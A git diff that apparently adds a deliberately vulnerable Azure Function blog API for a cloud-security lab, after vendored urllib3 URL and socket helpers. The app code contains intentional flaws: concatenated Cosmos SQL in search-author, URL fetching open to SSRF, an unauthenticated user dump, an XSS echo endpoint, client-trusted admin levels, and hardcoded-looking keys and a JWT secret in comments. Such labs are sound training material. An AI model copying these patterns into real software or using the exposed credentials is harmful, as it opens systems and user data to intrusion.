Turn the path into a list of segments + output = [] # Initialize the variable to use to store output + + for segment in segments: + # '.' is the current directory, so ignore it, it is superfluous + if segment == ".": + continue + # Anything other than '..', should be appended to the output + elif segment != "..": + output.append(segment) + # In this case segment == '..', if we can, we should pop the last + # element + elif output: + output.pop() + + # If the path starts with '/' and the output is empty or the first string + # is non-empty + if path.startswith("/") and (not output or output[0]): + output.insert(0, "") + + # If the path starts with '/.' or '/..' ensure we add one more empty + # string to add a trailing '/' + if path.endswith(("/.", "/..")): + output.append("") + + return "/".join(output) + + +def _normalize_host(host, scheme): + if host: + if isinstance(host, six.binary_type): + host = six.ensure_str(host) + + if scheme in NORMALIZABLE_SCHEMES: + is_ipv6 = IPV6_ADDRZ_RE.match(host) + if is_ipv6: + match = ZONE_ID_RE.search(host) + if match: + start, end = match.span(1) + zone_id = host[start:end] + + if zone_id.startswith("%25") and zone_id != "%25": + zone_id = zone_id[3:] + else: + zone_id = zone_id[1:] + zone_id = "%" + _encode_invalid_chars(zone_id, UNRESERVED_CHARS) + return host[:start].lower() + zone_id + host[end:] + else: + return host.lower() + elif not IPV4_RE.match(host): + return six.ensure_str( + b".".join([_idna_encode(label) for label in host.split(".")]) + ) + return host + + +def _idna_encode(name): + if name and any([ord(x) > 128 for x in name]): + try: + import idna + except ImportError: + six.raise_from( + LocationParseError("Unable to parse URL without the 'idna' module"), + None, + ) + try: + return idna.encode(name.lower(), strict=True, std3_rules=True) + except idna.IDNAError: + six.raise_from( + LocationParseError(u"Name '%s' is not a valid IDNA label" % name), None + ) + return name.lower().encode("ascii") + + +def _encode_target(target): + """Percent-encodes a request target so that there are no invalid characters""" + path, query = TARGET_RE.match(target).groups() + target = _encode_invalid_chars(path, PATH_CHARS) + query = _encode_invalid_chars(query, QUERY_CHARS) + if query is not None: + target += "?" + query + return target + + +def parse_url(url): + """ + Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is + performed to parse incomplete urls. Fields not provided will be None. + This parser is RFC 3986 compliant. + + The parser logic and helper functions are based heavily on + work done in the ``rfc3986`` module. + + :param str url: URL to parse into a :class:`.Url` namedtuple. + + Partly backwards-compatible with :mod:`urlparse`. + + Example:: + + >>> parse_url('http://google.com/mail/') + Url(scheme='http', host='google.com', port=None, path='/mail/', ...) + >>> parse_url('google.com:80') + Url(scheme=None, host='google.com', port=80, path=None, ...) + >>> parse_url('/foo?bar') + Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...) + """ + if not url: + # Empty + return Url() + + source_url = url + if not SCHEME_RE.search(url): + url = "//" + url + + try: + scheme, authority, path, query, fragment = URI_RE.match(url).groups() + normalize_uri = scheme is None or scheme.lower() in NORMALIZABLE_SCHEMES + + if scheme: + scheme = scheme.lower() + + if authority: + auth, _, host_port = authority.rpartition("@") + auth = auth or None + host, port = _HOST_PORT_RE.match(host_port).groups() + if auth and normalize_uri: + auth = _encode_invalid_chars(auth, USERINFO_CHARS) + if port == "": + port = None + else: + auth, host, port = None, None, None + + if port is not None: + port = int(port) + if not (0 <= port <= 65535): + raise LocationParseError(url) + + host = _normalize_host(host, scheme) + + if normalize_uri and path: + path = _remove_path_dot_segments(path) + path = _encode_invalid_chars(path, PATH_CHARS) + if normalize_uri and query: + query = _encode_invalid_chars(query, QUERY_CHARS) + if normalize_uri and fragment: + fragment = _encode_invalid_chars(fragment, FRAGMENT_CHARS) + + except (ValueError, AttributeError): + return six.raise_from(LocationParseError(source_url), None) + + # For the sake of backwards compatibility we put empty + # string values for path if there are any defined values + # beyond the path in the URL. + # TODO: Remove this when we break backwards compatibility. + if not path: + if query is not None or fragment is not None: + path = "" + else: + path = None + + # Ensure that each part of the URL is a `str` for + # backwards compatibility. + if isinstance(url, six.text_type): + ensure_func = six.ensure_text + else: + ensure_func = six.ensure_str + + def ensure_type(x): + return x if x is None else ensure_func(x) + + return Url( + scheme=ensure_type(scheme), + auth=ensure_type(auth), + host=ensure_type(host), + port=port, + path=ensure_type(path), + query=ensure_type(query), + fragment=ensure_type(fragment), + ) + + +def get_host(url): + """ + Deprecated. Use :func:`parse_url` instead. + """ + p = parse_url(url) + return p.scheme or "http", p.hostname, p.port diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/wait.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/wait.py new file mode 100644 index 0000000..21b2780 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/wait.py @@ -0,0 +1,153 @@ +import errno +import select +import sys +from functools import partial + +try: + from time import monotonic +except ImportError: + from time import time as monotonic + +__all__ = ["NoWayToWaitForSocketError", "wait_for_read", "wait_for_write"] + + +class NoWayToWaitForSocketError(Exception): + pass + + +# How should we wait on sockets? +# +# There are two types of APIs you can use for waiting on sockets: the fancy +# modern stateful APIs like epoll/kqueue, and the older stateless APIs like +# select/poll. The stateful APIs are more efficient when you have a lots of +# sockets to keep track of, because you can set them up once and then use them +# lots of times. But we only ever want to wait on a single socket at a time +# and don't want to keep track of state, so the stateless APIs are actually +# more efficient. So we want to use select() or poll(). +# +# Now, how do we choose between select() and poll()? On traditional Unixes, +# select() has a strange calling convention that makes it slow, or fail +# altogether, for high-numbered file descriptors. The point of poll() is to fix +# that, so on Unixes, we prefer poll(). +# +# On Windows, there is no poll() (or at least Python doesn't provide a wrapper +# for it), but that's OK, because on Windows, select() doesn't have this +# strange calling convention; plain select() works fine. +# +# So: on Windows we use select(), and everywhere else we use poll(). We also +# fall back to select() in case poll() is somehow broken or missing. + +if sys.version_info >= (3, 5): + # Modern Python, that retries syscalls by default + def _retry_on_intr(fn, timeout): + return fn(timeout) + + +else: + # Old and broken Pythons. + def _retry_on_intr(fn, timeout): + if timeout is None: + deadline = float("inf") + else: + deadline = monotonic() + timeout + + while True: + try: + return fn(timeout) + # OSError for 3 <= pyver < 3.5, select.error for pyver <= 2.7 + except (OSError, select.error) as e: + # 'e.args[0]' incantation works for both OSError and select.error + if e.args[0] != errno.EINTR: + raise + else: + timeout = deadline - monotonic() + if timeout < 0: + timeout = 0 + if timeout == float("inf"): + timeout = None + continue + + +def select_wait_for_socket(sock, read=False, write=False, timeout=None): + if not read and not write: + raise RuntimeError("must specify at least one of read=True, write=True") + rcheck = [] + wcheck = [] + if read: + rcheck.append(sock) + if write: + wcheck.append(sock) + # When doing a non-blocking connect, most systems signal success by + # marking the socket writable. Windows, though, signals success by marked + # it as "exceptional". We paper over the difference by checking the write + # sockets for both conditions. (The stdlib selectors module does the same + # thing.) + fn = partial(select.select, rcheck, wcheck, wcheck) + rready, wready, xready = _retry_on_intr(fn, timeout) + return bool(rready or wready or xready) + + +def poll_wait_for_socket(sock, read=False, write=False, timeout=None): + if not read and not write: + raise RuntimeError("must specify at least one of read=True, write=True") + mask = 0 + if read: + mask |= select.POLLIN + if write: + mask |= select.POLLOUT + poll_obj = select.poll() + poll_obj.register(sock, mask) + + # For some reason, poll() takes timeout in milliseconds + def do_poll(t): + if t is not None: + t *= 1000 + return poll_obj.poll(t) + + return bool(_retry_on_intr(do_poll, timeout)) + + +def null_wait_for_socket(*args, **kwargs): + raise NoWayToWaitForSocketError("no select-equivalent available") + + +def _have_working_poll(): + # Apparently some systems have a select.poll that fails as soon as you try + # to use it, either due to strange configuration or broken monkeypatching + # from libraries like eventlet/greenlet. + try: + poll_obj = select.poll() + _retry_on_intr(poll_obj.poll, 0) + except (AttributeError, OSError): + return False + else: + return True + + +def wait_for_socket(*args, **kwargs): + # We delay choosing which implementation to use until the first time we're + # called. We could do it at import time, but then we might make the wrong + # decision if someone goes wild with monkeypatching select.poll after + # we're imported. + global wait_for_socket + if _have_working_poll(): + wait_for_socket = poll_wait_for_socket + elif hasattr(select, "select"): + wait_for_socket = select_wait_for_socket + else: # Platform-specific: Appengine. + wait_for_socket = null_wait_for_socket + return wait_for_socket(*args, **kwargs) + + +def wait_for_read(sock, timeout=None): + """Waits for reading to be available on a given socket. + Returns True if the socket is readable, or False if the timeout expired. + """ + return wait_for_socket(sock, read=True, timeout=timeout) + + +def wait_for_write(sock, timeout=None): + """Waits for writing to be available on a given socket. + Returns True if the socket is readable, or False if the timeout expired. + """ + return wait_for_socket(sock, write=True, timeout=timeout) diff --git a/modules/module-1/resources/azure_function/data/app/__init__.py b/modules/module-1/resources/azure_function/data/app/__init__.py new file mode 100644 index 0000000..f4a0b9b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/app/__init__.py @@ -0,0 +1,837 @@ +import logging +import json +import traceback +import base64 +from datetime import datetime, timedelta +import urllib +import os +import bcrypt +import jwt +import azure.functions as func +from azure.cosmos import CosmosClient, PartitionKey +from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient +################## + +def generateResponse(statusCode, body): + headers = { + "Access-Control-Allow-Headers": "Content-Type", + "Access-Control-Allow-Origin": "*", + } + return func.HttpResponse( + body, + headers=headers, status_code=statusCode + ) + +def download_url(url): + req = urllib.request.Request(url, headers={"User-Agent": "Magic Browser"}) + image = urllib.request.urlopen(req).read() + return image + +#upload function here +def upload_file(img_data, container, url=None): + object_name = "images/" + datetime.utcnow().strftime("%Y%m%d%H%M%S%f") + ".png" + connect_string = os.environ['CON_STR'] + #connect_string = 'DefaultEndpointsProtocol=https;AccountName=blogapidataprjstg;AccountKey=lonXJiSzbilWwyQ/Ya+oqtCZucx2C0x2mNw81iRm+qGoz955Cy/Rc4GJu+W+YY7uXlMGETC+zbwP+AStUczL1g==;EndpointSuffix=core.windows.net' + blob = BlobClient.from_connection_string(conn_str=connect_string, container_name=container, blob_name=object_name) + file_b64 = "" + + if url == True: + file = download_url(img_data) + print(file) + else: + file = base64.b64decode(img_data) + try: + blob.upload_blob(file) + object_url = blob.url + return object_url + except Exception as e: + print(str(e)) + return "Please try with another image" + +def generate_auth(userInfo): + if userInfo is not None: + JWT_SECRET = os.environ['JWT_SECRET'] + # JWT_SECRET = "T2BYL6#]zc>Byuzu" + userInfo['exp'] = datetime.now() + timedelta(seconds=3600) + return jwt.encode(payload=userInfo, key=JWT_SECRET, algorithm='HS256') + else: + return None + +def auth_is_valid(req): + JWT_SECRET = '' + JWT_TOKEN = req.headers.get('JWT_TOKEN') or req.headers.get('jwt_token') + if JWT_TOKEN != '': + # JWT_TOKEN = event['headers']['JWT_TOKEN'] + JWT_SECRET = os.environ['JWT_SECRET'] + # JWT_SECRET = "T2BYL6#]zc>Byuzu" + try: + decode_token = jwt.decode( + JWT_TOKEN, JWT_SECRET, algorithms=['HS256']) + print("Token is still valid and active") + return True + except jwt.ExpiredSignatureError: + print("Token expired. Get new one") + return False + except jwt.InvalidTokenError as e: + print("Invalid Token") + return False + else: + print("returning false authentication") + return False + +def main(req: func.HttpRequest) -> func.HttpResponse: + + # params = req.params.get('value') + path = req.route_params.get("path") + method = req.method + try: + data = json.loads(req.get_body()) + except: + data = {} + + print(data) + logging.info(data) + responses = '' + userTable = 'blog-users' + postsTable = 'blog-posts' + + AZ_DB_ENDPOINT = os.environ['AZ_DB_ENDPOINT'] + # AZ_DB_ENDPOINT = 'https://ine-cosmos-db-other.documents.azure.com:443/' + AZ_DB_PRIMARYKEY = os.environ['AZ_DB_PRIMARYKEY'] + # AZ_DB_PRIMARYKEY = 'xO46Cch3ATvOqtU1h9kuyaqjer1rcG4bQBNwnQ0mhAlQzhWZ2lkU3ahyV0bKBu06wITmBwcJ40cjZKNAJQbZ8A==' + client = CosmosClient(AZ_DB_ENDPOINT, AZ_DB_PRIMARYKEY) + DATABASE_NAME = 'ine-cosmos-sql-db' + database = client.get_database_client(database=DATABASE_NAME) + user_container = database.get_container_client(userTable) + post_container = database.get_container_client(postsTable) + + if method == "POST" and path == "register": + new_user = {} + if "email" in data: + new_user["email"] = data["email"].lower().strip() + if "address" in data: + new_user["address"] = data["address"] + if "country" in data: + new_user["country"] = data["country"] + if "name" in data: + new_user["name"] = data["name"] + if "phone" in data: + new_user["phone"] = data["phone"] + if "secretQuestion" in data: + new_user["secretQuestion"] = data["secretQuestion"] + if "secretAnswer" in data: + new_user["secretAnswer"] = data["secretAnswer"] + if "creationDate" in data: + new_user["creationDate"] = data["creationDate"] + if "username" in data: + new_user["username"] = data["username"].lower().strip() + if "password" in data: + new_user["password"] = data["password"].encode('utf-8').strip() + + required_info = ["email", "username", "password", + "country", "secretQuestion", "secretAnswer"] + + for field in required_info: + if field not in new_user: + return generateResponse(200, "Fields required") + + new_user['authLevel'] = '300' + new_user['userStatus'] = 'active' + #azure + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + response = list(user_container.query_items(**params)) + # response = dbUserTable.scan() + logging.info(response) + items = response + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(new_user["email"])}], + 'enable_cross_partition_query': True + } + check_user_email = list(user_container.query_items(**params)) + logging.info(check_user_email) + if 'Item' in check_user_email: + responses = "User with email already exists. Please choose a different email address" + return generateResponse(200, json.dumps({"body": responses})) + + new_user["id"] = str(len(items)+1) + logging.info("id is") + logging.info(new_user["id"]) + new_user["password"] = bcrypt.hashpw( + new_user["password"], bcrypt.gensalt(rounds=10)).decode('utf-8') + # logging.info("password is") + # logging.info(new_user["password"]) + # logging.info(new_user) + user_container.upsert_item(new_user) + responses = "User Registered" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "login": + user_email = data['email'] + user_password = data['password'] + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": user_email}], + 'enable_cross_partition_query': True + } + db_user = list(user_container.query_items(**params)) + # db_user = dbUserTable.get_item(Key={"email": new_user["email"]})#azure + # if(len(db_user)>0): + # db_user = { + # "Item":db_user + # } + logging.info("new user is") + logging.info(db_user) + + # if 'Item' not in db_user: + # responses = "User with email "+user_email+" not found" + # return generateResponse(200, json.dumps({"body": responses})) + + if user_email != db_user[0]['email']: + responses = "User with email "+user_email+" not found" + return generateResponse(200, json.dumps({"body": responses})) + if db_user[0]['userStatus'] == "banned": + responses = "User is banned. Please contact your administrator" + return generateResponse(200, json.dumps({"body": responses})) + if not bcrypt.checkpw((user_password).encode('utf-8'), (db_user[0]['password']).encode('utf-8')): + responses = "Incorrect Password!!" + return generateResponse(200, json.dumps({"body": responses})) + + userInfo = { + 'id': db_user[0]['id'], + 'email': db_user[0]['email'], + 'name': db_user[0]['name'], + 'authLevel': db_user[0]['authLevel'], + 'address': db_user[0]['address'], + 'country': db_user[0]['country'], + 'phone': db_user[0]['phone'], + 'secretQuestion': db_user[0]['secretQuestion'], + 'secretAnswer': db_user[0]['secretAnswer'], + 'username': db_user[0]['username'], + 'admin': 'johndoe@gmail.com' + } + gen_token = generate_auth(userInfo) + responses = { + 'user': userInfo, + 'token': (gen_token).decode('utf-8') + } + logging.info(responses) + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "reset-password": + if 'email' not in data or 'secretQuestion' not in data or 'secretAnswer' not in data or 'password' not in data: + responses="All fields are required" + return generateResponse(200, json.dumps({"body": responses})) + + email=data['email'].lower().strip() + secretQuestion=data['secretQuestion'] + secretAnswer=data['secretAnswer'] + newPassword=data['password'] + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(email)}], + 'enable_cross_partition_query': True + } + user_data = list(user_container.query_items(**params)) + + if user_data[0]['secretQuestion'] != secretQuestion or user_data[0]['secretAnswer'] != secretAnswer: + responses="Secret question or key doesn't match" + return generateResponse(200, json.dumps({"body": responses})) + + encryptedPW = bcrypt.hashpw((newPassword).encode('utf-8'), bcrypt.gensalt(rounds=10)) + + for item in user_data: + if item['email'] == email: + new_item = item + new_item['password'] = (encryptedPW).decode('utf-8') + update_response = user_container.replace_item(item, new_item) + break + + responses = "Password changed successfully" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "dump": + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + postItems = list(post_container.query_items(**params)) + + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + userItems = list(user_container.query_items(**params)) + responses=userItems+postItems + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "list-posts": + try: + data = json.loads(req.get_body()) + except: + data = None + if data is None: + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + items = list(post_container.query_items(**params)) + for item in items: + if item['postStatus'] != 'approved': + items.remove(item) + for item in items: + if item['postStatus'] != 'approved': + items.remove(item) + return generateResponse(200, json.dumps({"body": items})) + + authLevel=data['authLevel'] + postStatus=data['postStatus'] + email= data['email'] + + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + items = list(post_container.query_items(**params)) + + # postStatus - > accepted, rejected, pending, all + responses=[] + if authLevel=='0' or authLevel=='100': + if postStatus!='all': + for i in range(len(items)): + item=items[i] + if item['postStatus'] == postStatus: + responses.append(item) + else: + for i in range(len(items)): + item=items[i] + responses.append(item) + else: + if postStatus!='all': + for i in range(len(items)): + item=items[i] + if item['postStatus'] == postStatus and item['email']==email: + responses.append(item) + else: + for i in range(len(items)): + item=items[i] + if item['email']==email: + responses.append(item) + + print(len(items)) + print(len(responses)) + return generateResponse(200, json.dumps({"body": responses})) + + if auth_is_valid(req): + + if method == "POST" and path == "change-password": + id = data['id'].strip() + + if 'newPassword' not in data or 'confirmNewPassword' not in data: + responses = 'New password & Confirm new password are mandatory' + return generateResponse(200, json.dumps({"body": responses})) + + newPassword = data['newPassword'].strip() + confirmNewPassword = data['confirmNewPassword'].strip() + + if (newPassword != confirmNewPassword): + responses = 'New password & Confirm new password must match' + return generateResponse(200, json.dumps({"body": responses})) + + # db_data = dbUserTable.scan()#azure + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + db_data = list(user_container.query_items(**params)) + + for item in db_data: + if item['id'] == id: + email=item['email'] + break + + encryptedPW = bcrypt.hashpw((newPassword).encode('utf-8'), bcrypt.gensalt(rounds=10)) + + for item in db_data: + if item['id'] == id: + new_item = item + new_item['password'] = (encryptedPW).decode('utf-8') + update_response = user_container.replace_item(item, new_item) + break + + responses = { + 'email': email, + 'newPassword': newPassword, + 'message': "Password changed successfully", + 'authLevel': db_data[0]['authLevel'], + 'country': db_data[0]['country'], + 'id': id, + 'phone': db_data[0]['phone'], + 'username': db_data[0]['username'], + 'userStatus': db_data[0]['userStatus'] + } + return generateResponse(200, json.dumps({"body": responses})) + + + + elif method == "POST" and path == "ban-user": + if 'name' not in data or 'authLevel' not in data or 'email' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + name = data['name'] + authLevel = data['authLevel'] + email = data['email'] + + if authLevel != '0': + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(email)}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + if 'email' not in check_user[0]: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + if check_user[0]['userStatus'] == 'banned': + responses = "User already banned" + return generateResponse(200, json.dumps({"body": responses})) + else: + for item in check_user: + if item['email'] == email: + new_item = item + new_item['userStatus'] = 'banned' + update_response = user_container.replace_item(item, new_item) + break + responses = "User "+email+" Banned" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "unban-user": + if 'name' not in data or 'authLevel' not in data or 'email' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + name = data['name'] + authLevel = data['authLevel'] + email = data['email'] + + if authLevel != '0': + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": str(email)}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + + if 'email' not in check_user[0]: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + if check_user[0]['userStatus'] != 'banned': + responses = "User already Unbanned" + return generateResponse(200, json.dumps({"body": responses})) + else: + for item in check_user: + if item['email'] == email: + new_item = item + new_item['userStatus'] = 'active' + update_response = user_container.replace_item(item, new_item) + break + responses = "User "+email+" Unbanned" + return generateResponse(200, json.dumps({"body": responses})) + + + elif method == "POST" and path == "xss": + responses = data['scriptValue'] + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "save-post": + new_post = {} + if "postTitle" in data: + new_post["postTitle"] = data["postTitle"] + if "authorName" in data: + new_post["authorName"] = data["authorName"] + if "postingDate" in data: + new_post["postingDate"] = data["postingDate"] + if "email" in data: + new_post["email"] = data["email"] + if "postContent" in data: + new_post["postContent"] = data["postContent"] + if "getRequestImageData" in data: + new_post["getRequestImageData"] = data["getRequestImageData"] + + + required_info = ["postTitle", "authorName", "postingDate", + "email", "postContent", "getRequestImageData"] + + for field in required_info: + if field not in new_post: + return generateResponse(200, "Fields required") + + new_post['postStatus'] = 'pending' + + params = { + 'query': 'SELECT * FROM c ', + 'enable_cross_partition_query': True + } + items = list(post_container.query_items(**params)) + + new_post['id'] = str(len(items)+1) + + post_container.upsert_item(new_post) + + responses = "Post Added" + return generateResponse(200, json.dumps({"body": responses})) + + elif path == "save-content": + container = os.environ['CONTAINER_NAME'] + if method == "POST": + try: + img_data = json.loads(req.get_body()) + except: + img_data = {} + # print(img_data) + responses = upload_file(img_data['value'], container) + print(responses) + return generateResponse(200, json.dumps({"body": responses})) + # Decode base64 and upload to storage account container + + elif method == "GET": + # Download from url as base64 and upload to storage account container + try: + img_data = req.params.get('value') + except: + img_data = '' + + # print(img_data) + responses = upload_file(img_data, container, True) + return generateResponse(200, json.dumps({"body": responses})) + else: + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "search-author": + + name = data["value"] + authLevel = data['authLevel'] + + if authLevel == '300': + exec_statement="SELECT * FROM c where c.name = " + "'"+name+"'" + "and c.authLevel in ('300','200')" + elif authLevel == '200': + exec_statement="SELECT * FROM c where c.name =" + "'"+name+"'" + "and c.authLevel in ('300','200','100')" + elif authLevel == '100': + exec_statement="SELECT * FROM c where c.name = " + "'"+name+"'" +"and c.authLevel in ('300','200','100')" + else: + exec_statement="SELECT * FROM c where c.name = " + "'"+name+"'" + logging.info(exec_statement) + params = { + 'query': exec_statement, + 'enable_cross_partition_query': True + } + responses = list(user_container.query_items(**params)) + + if len(responses) > 0: + for item in responses: + item['password'] = '' + item["secretAnswer"] = "" + item["secretQuestion"] = "" + + print("Response ", responses) + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "get-users": + # client = boto3.client("dynamodb") + # data = json.loads(event["body"]) + logging.info(data) + authLevel = data['authLevel'] + + if authLevel == '300': + exec_statement="SELECT * FROM c where c.authLevel in ('300','200')" + elif authLevel == '200': + exec_statement="SELECT * FROM c where c.authLevel in ('300','200','100')" + elif authLevel == '100': + exec_statement="SELECT * FROM c where c.authLevel in ('300','200','100')" + else: + exec_statement='SELECT * FROM c' + + params = { + 'query': exec_statement, + 'enable_cross_partition_query': True + } + responses = list(user_container.query_items(**params)) + + # if responses != {}: + # responses[0]['password'] = '' + if len(responses) > 0: + for item in responses: + item['password'] = '' + item["secretAnswer"] = "" + item["secretQuestion"] = "" + print("Response ", responses) + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "delete-user": + + if 'authLevel' not in data or 'email' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + authLevel = data['authLevel'] + email = data['email'] + + if authLevel != '0': + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + + # check_user = dbUserTable.get_item(Key={"email": email}) + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": email}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + + if len(check_user) < 1: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + + # delete_response = dbUserTable.delete_item(Key={'email': email,}) + delete_response = user_container.delete_item(check_user[0], partition_key=check_user[0]['id']) + + responses = "User "+email+" deleted" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "change-auth": + if 'authLevel' not in data or 'email' not in data or 'userAuthLevel' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + authLevel = data['authLevel'] + email = data['email'] + userAuthLevel =data['userAuthLevel'].strip() + + if authLevel != "0": + responses = "Requires Admin" + return generateResponse(200, json.dumps({"body": responses})) + + if userAuthLevel == 'Reassign as Admin': + userAuthLevel = '0' + elif userAuthLevel == 'Reassign as Author': + userAuthLevel = '200' + elif userAuthLevel == 'Reassign as Editor': + userAuthLevel = '100' + else: + userAuthLevel = '300' + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": email}], + 'enable_cross_partition_query': True + } + check_user = list(user_container.query_items(**params)) + + if len(check_user) < 1: + responses = "User does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + for item in check_user: + if item['email'] == email: + new_item = item + new_item['authLevel'] = userAuthLevel + update_response = user_container.replace_item(item, new_item) + break + responses = "User "+email+" AuthLevel Updated" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "user-details-modal": + + email = data['email'] + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": email}], + 'enable_cross_partition_query': True + } + + responses = list(post_container.query_items(**params)) + + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "modify-post-status": + + if 'authLevel' not in data or 'postStatus' not in data or 'id' not in data: + responses = "Something is missing. Please check proper authentication" + return generateResponse(200, json.dumps({"body": responses})) + + authLevel = data['authLevel'] + id = data['id'] + postStatus =data['postStatus'].lower().strip() + + if not (authLevel == '0' or authLevel =='100'): + responses = "Requires Admin or Editor" + return generateResponse(200, json.dumps({"body": responses})) + + # check_post = dbPostTable.get_item(Key={"id": id}) + params = { + 'query': 'SELECT * FROM c WHERE c.id = @id', + 'parameters': [{"name": "@id", "value": id}], + 'enable_cross_partition_query': True + } + check_post = list(post_container.query_items(**params)) + + if len(check_post)<1: + responses = "Post does not exists" + return generateResponse(200, json.dumps({"body": responses})) + + for item in check_post: + if item['id'] == id: + new_item = item + new_item['postStatus'] = postStatus + update_response = post_container.replace_item(item, new_item) + break + + responses = "Post "+id+" status Updated" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "change-profile": + new_user_data = {} + if "email" in data: + new_user_data["email"] = data["email"].lower().strip() + if "address" in data: + new_user_data["address"] = data["address"] + if "country" in data: + new_user_data["country"] = data["country"] + if "name" in data: + new_user_data["name"] = data["name"] + if "phone" in data: + new_user_data["phone"] = data["phone"] + if "secretQuestion" in data: + new_user_data["secretQuestion"] = data["secretQuestion"] + if "secretAnswer" in data: + new_user_data["secretAnswer"] = data["secretAnswer"] + if "username" in data: + new_user_data["username"] = data["username"].lower().strip() + + required_info = ["email", "address","name","phone", "username", + "country", "secretQuestion", "secretAnswer"] + + for field in required_info: + if field not in new_user_data: + return generateResponse(200, json.dumps({"body": "All Fields required"})) + + new_user_data['userStatus'] = 'active' + + params = { + 'query': 'SELECT * FROM c WHERE c.email = @email', + 'parameters': [{"name": "@email", "value": new_user_data["email"]}], + 'enable_cross_partition_query': True + } + user = list(user_container.query_items(**params)) + olduserdata = user + + user[0]['address'] = new_user_data['address'] + user[0]['name'] = new_user_data['name'] + user[0]['phone'] = new_user_data['phone'] + user[0]['username'] = new_user_data['username'] + user[0]['country'] = new_user_data['country'] + user[0]['secretQuestion'] = new_user_data['secretQuestion'] + user[0]['secretAnswer'] = new_user_data['secretAnswer'] + + update_response = user_container.replace_item(olduserdata[0], user[0]) + + responses = "User "+new_user_data['email']+" Updated" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "get-dashboard": + currentYear = str(datetime.now().year) + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + + posts = list(post_container.query_items(**params)) + + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + users = list(user_container.query_items(**params)) + + total_posts=str(len(posts)) + total_users=str(len(users)) + + print("Total Posts: "+total_posts) + print("Total Users: "+total_users) + data={} + + for post in posts: + postingdate=post['postingDate'] + print(postingdate) + if postingdate[:7] in data: + data[postingdate[:7]]=data[postingdate[:7]] + 1 + else: + if (postingdate[:4]==currentYear): + data[postingdate[:7]]=1 + + for i in range(1,13): + mm=str(i).zfill(2) + key=currentYear+'-'+mm + if key not in data: + data[key]=0 + + chartLabels=list(data.keys()) + chartData=list(data.values()) + + for i in range(len(chartLabels)): + label=chartLabels[i] + yyyy=label[:4] + mm=label[5:7] + lab=mm+"/01/"+yyyy + chartLabels[i]=lab + + + recent_user_names=[] + recent_user_times=[] + for user in users: + createtime=datetime.strptime(user['creationDate'][:10], '%Y-%m-%d') + recent_user_names.append(user['name']) + recent_user_times.append(createtime) + + top_recent_users=[] + top_recent_times=[] + + for i in range(5): + list_index=recent_user_times.index(max(recent_user_times)) + top_recent_times.append(recent_user_times[list_index].strftime("%d %b %Y")) + top_recent_users.append(recent_user_names[list_index]) + del recent_user_names[list_index] + del recent_user_times[list_index] + + responses={ + "totalPosts": total_posts, + "totalUsers": total_users, + "chartLabel": chartLabels, + "chartData": chartData, + "recentUserNames": top_recent_users, + "recentUserDates": top_recent_times + } + return generateResponse(200, json.dumps({"body": responses})) + + else: + return generateResponse(200, json.dumps({"body": responses})) + + responses = "Invalid Authorization" + return generateResponse(200, json.dumps({"body": responses})) + + + diff --git 